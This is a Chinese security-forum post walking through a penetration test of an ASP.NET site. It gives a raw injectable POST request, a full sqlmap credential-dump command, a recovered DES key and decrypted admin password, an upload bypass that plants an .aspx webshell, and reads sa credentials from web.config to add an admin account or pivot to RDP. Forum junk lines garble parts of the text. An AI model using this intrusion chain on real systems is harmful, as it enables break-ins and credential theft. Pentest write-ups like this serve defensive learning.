|
7 h: F1 n0 B9 N/ K
注:各位同仁,今天晚上主要防止被限号来凑个数字,这篇文章本来是给一个机构做科普的,所以写的有点怎么说,反正土司的人看了会骂哈哈,大家凑合的看,文中哪怕有那么一点半点东西,能给大家带来启发,那么我这个文章就没白发,所以大佬们轻点喷哈哈,嘴下留情哈哈。 1、POST注入猜解网站管理员账号密码 通过awvs扫描发现存在注入,直接在avws下的Scans---target下点击你扫描的过目标如图:
0 m/ _% n) i3 w/ C6 i4 P- f' `. S
7 @+ C- a2 [4 ^, Z/ H5 k
; N6 j u* F! v9 t# i2 n3 @, a6 M/ }0 F 
! [4 P9 x( G0 j8 y
1 [& O( O n$ Y7 f$ q& P% E0 T, d% Y' y" t. i
然后点vulnerabilities,如图:
; e7 l$ b7 _6 r1 ?' H! G8 t : W T' v ^. m8 o+ ^3 w8 p; t
8 j) d& u9 D, G 
+ m3 n0 r8 Q( ^' X4 y6 O
. s* g- Q( V8 z6 z- Z5 c. `5 u, K, a; T2 z) u6 s
点SQL injection会看到HTTPS REQUESTS,如图:
. n8 s/ K6 L, P: K G
) q9 p- Y% d7 c: U* L* e6 A* o( f$ O% m6 }
 ; A, ~) f) i5 S0 o
" c% ?4 f' ?4 u1 m. f+ y* o2 e4 W6 j5 b) p* G0 O
获取到http的数据包,如下: POST /Product/ProductHandler.ashx HTTP/1.1 Host: www.test.cn Cache-Control: no-cache Accept: text/plain, /; q=0.01 Origin: http://www.test.cn User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://www.test.cn/ Accept-Language: en-us,en;q=0.5 X-Scanner: Netsparker Accept-Encoding: gzip, deflate Content-Length: 157 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
: D8 i: q ^" ~8 l" @7 H
2 ^# ?* P' `6 d
! F2 Y5 f( ^1 k' _3 e; A: | Type=GetProductList&pageIndex=3&pageSize=5&productType=*&supplierType=1 把以上post包保存到sqlmap根目录下,保存为1.txt,注入参数提前用awvs已经识别,注入参数是productType,注入命令为: sqlmap.py -r 1.txt --level 5 --risk 3 -p productType --dbms=mssql -D cci -T Zy_user -C u_loginname,u_loginpassword –dump 此sqlmap命令的意思是读取数据库cci下Zy_user表的用户名密码列名,dump就是保存下来的意思,会保存在./sqlmap/output下,以excel表格的格式保存着下载下来的表的内容。 注入用户名密码加密值如图:# F( u. d `, j5 m2 l6 o
/ P: w' Q, ^) o$ t. {
/ @! o1 O. b2 S8 O 
. z/ M+ ?2 M1 ?4 Y! E7 i, | 6 P: ], |( b2 S- i
8 |+ I9 d i2 n1 D. U0 @
2、通过对bin目录dll进行反编译解密管理员加密值登录后台 通过前面的sql注入可获取网站后台账号和密码加密值,为了更深入的测试网站后台是否存在其他漏洞,需要黑盒测试模拟黑客攻击进一步测试,故对网站目录bin目录下的dll进行反编译来获取加密密匙,最终成功解密密码。 把bin目录下的dll全部加载到Reflector中,然后通过跟踪常用用户密码相关的类函数,得出如下结果:
& _0 O) c' O( m6 [ E2 O
8 k$ q# Y, {' _: o
; R3 a4 @% M. O) h) ~! A  / a3 D k3 ^: J) c0 f H# F
- c6 `( f3 U# G2 u
! Y z$ o- l1 f$ i! I# F% R  5 T$ X( [' a% _: H/ o# u8 F
5 Y* l! Y; Q$ }
3 f1 J$ K1 o$ j/ D! P* }8 z9 B; ^
得知密钥是fkue且为des加密,接着定位encrypt类函数找出其解密方式如图:
- r$ p- x3 L# ^2 Z( m3 K8 m7 [ $ @7 N4 j' m# i% U, `' G* A
0 w/ W ?% y4 V2 [
 : }0 G! a$ k2 ~) ?
+ q! J* a- {- N" G: _; k
' u, h8 ?1 o. c' c5 w) n 解密方式是把fkue使用md5进行加密,然后取32位md5加密值的前8位作为加密密钥,如图:) y, ~4 `! q6 ]4 V) o8 q5 n
9 _$ p2 J* t: \7 t1 c
! j% c% c4 d, G7 |* @8 o  2 c* l& A) j. s7 t4 L% E
7 ]2 W) [# \0 t+ M7 }" w
/ F, R$ g' C8 v! l. |2 v9 P 通过在线解密网站解密得知加密密钥就是:1110AF03。 前面sql注入步骤已经成功获取admin的加密值,如图:5 G2 K) M Z, z. T" z( a; U
: ?+ e5 y! E& `$ s/ D. H3 L; t& Z. L
 " m, G9 V& h" D! {1 p8 U0 G% }
3 S! s; ^( Y2 h( ^- m" t; P: ]9 @. _ R7 q: m+ q
解密admin管理员密码如图:2 ]4 Z J4 B/ k. V. ?
# n; f% k) V( O3 o- {# F6 d5 n3 p7 U1 E: [' L
 / P% E/ V% l7 \5 H
9 v Y: L' ^ Q3 v. O* l( m: E2 D' d( [) L& [
然后用自己写了个解密工具,解密结果和在线网站一致! f6 P# C& Q- Z. p% P7 d
% F9 O( O/ I, g- o+ U7 E; F) _3 |
$ F9 o8 \" W/ J$ e% z  ( `8 s, L( {4 m+ G! s# i0 j
i1 D' M3 T/ V. Z. r; ?5 Y1 D4 p( c8 i+ M9 O" s+ u
解密后的密码为:123mhg,./,登陆如图:
# L: ?+ x8 u+ ~, z
2 q6 m, L6 S: \9 |
; ^$ ^/ c0 K& R5 {9 ~1 C: K* A  ; {" o) D7 }; [
+ Z7 c+ G2 ~. j; i( W8 B/ ?
/ M v8 { R/ F2 N8 Y7 }
3、后台上传绕过漏洞getwebshell如图: 登陆后台后,在添加信息处,会有上传图片的功能,随后使用burpsuite抓包如下图:- O% ?; L9 P( N$ ?8 B8 A6 m0 C. M
% {3 P# U9 z; B3 G8 n n- \ j
9 G( d0 ~8 E4 j  2 K0 i- V4 g9 Z9 W
9 l. q1 T- `$ O
5 B) ?" w: v6 @: m 
- f2 \) r% l+ E/ z& L$ A
! r3 ^" w9 T3 p% }1 h+ n! `$ y, P" F. i0 y/ |; t
绕过上传限制,只需要把包里的filename的1.jpg改为1.aspx,即可成功上传webshell,如下图:
- h: m4 D" d9 U! u" e4 o* T/ ^- ` - N0 I8 k" d0 o
. U, L8 P: T8 A& R7 u8 V
 5 U% B6 Z, v: K- o; d
9 E* ^! Y9 s9 B' k" @
. a8 A3 u. u8 A7 w$ ]5 ^' C 访问webshell如下图:; E/ e0 L0 j! [
% M6 ~9 J6 J3 K/ A0 S9 {& A
6 \& U; H' ?0 E$ r! H' } 
$ o* l/ e1 ^8 C- }) u( w + |: ^5 [6 q9 w- C& X6 n
( v( A' ? K: @* p 4、前台任意上传漏洞getwebshell 在目标站前台有注册账号功能,注册成功后,同样在上传图片处可直接上传webshell,链接为http://www.test.cn/userRegister.aspx,登录如图:
2 I1 @; f. w" W, i2 k$ Z5 J4 _ 1 k* U5 k/ e1 C- D7 i
% w& W! ?; j7 c/ F& x" I8 {9 } 
' r7 k6 |% W, K: C( G ! J5 _5 d1 n) g v' t
! P9 {( \4 Q7 a% ~ 在上传证件或者头像的处可直接上传aspx 后缀的webshell,上传成功后,点右键-属性,可查看上传后的webshell路径为:http://www.test.cn/Admin/upload/demo.aspx 然后登录如图:9 n! p3 v: Y# I! m; D
L8 B/ D$ j& t6 N2 \8 `; H" b, }( v2 J( o# b+ Q; G4 I
 0 s# `) E0 o6 l
# \8 o2 ~; o R8 H# a# t9 I3 @5 x4 d' S" m
通过查看网站路径下的web.config文件得到mssql数据库配置账号为sa的密码并且以windows身份认证配置的系统登录账号密码如图:3 Q1 N$ F9 ^. Q2 d2 A
/ O# n6 M- r+ t! D+ P3 Y: n% {" D2 c2 _$ }
 ; o* A S' E8 A8 D% i& _
% N9 W" A# r: b- y: d7 e
$ r' u: K4 _1 o# h* Z8 o+ o
可直接利用mssql sa权限执行系统命令添加管理员账号密码或者直接利用Windows登录密码webshell下利用lcx内网端口转发登陆3389。" e, r) j# u+ {) J2 |4 ~ g
3 o) S3 \; N# H. G* f( P2 t$ ?- y2 a0 _' W: [. c
总结:一套程序不应该只考虑其美观与功能强大,是要在满足安全的前提下再同时满足美观与功能。建议各个单位在系统上线之前,条件允许的情况下,首先进行白盒测试,其次进行黑盒测试,再次进行灰盒测试。如果通过白、黑、灰发现安全问题,那么就要再进行一轮这样的测试,直到系统难以被发现安全问题,然后再进行上线。特别是一些政府、企事业单位,数据面涉及基础人口等敏感数据,一旦遭到黑客攻击被泄露,给国家带来的损失是无法挽回的。好了以上就是今天分享的渗透内容,谢谢大家的收看!! }/ |0 ~: D a2 C# J' P
' l- n) @6 V) \ e, I' i- X! L) |8 {! F7 U
4 Q' `; K: }- i, [% v! n
( H7 @: X% l* Y; T6 h | | 
发表于 2023-11-28 20:23:22
收藏
支持
反对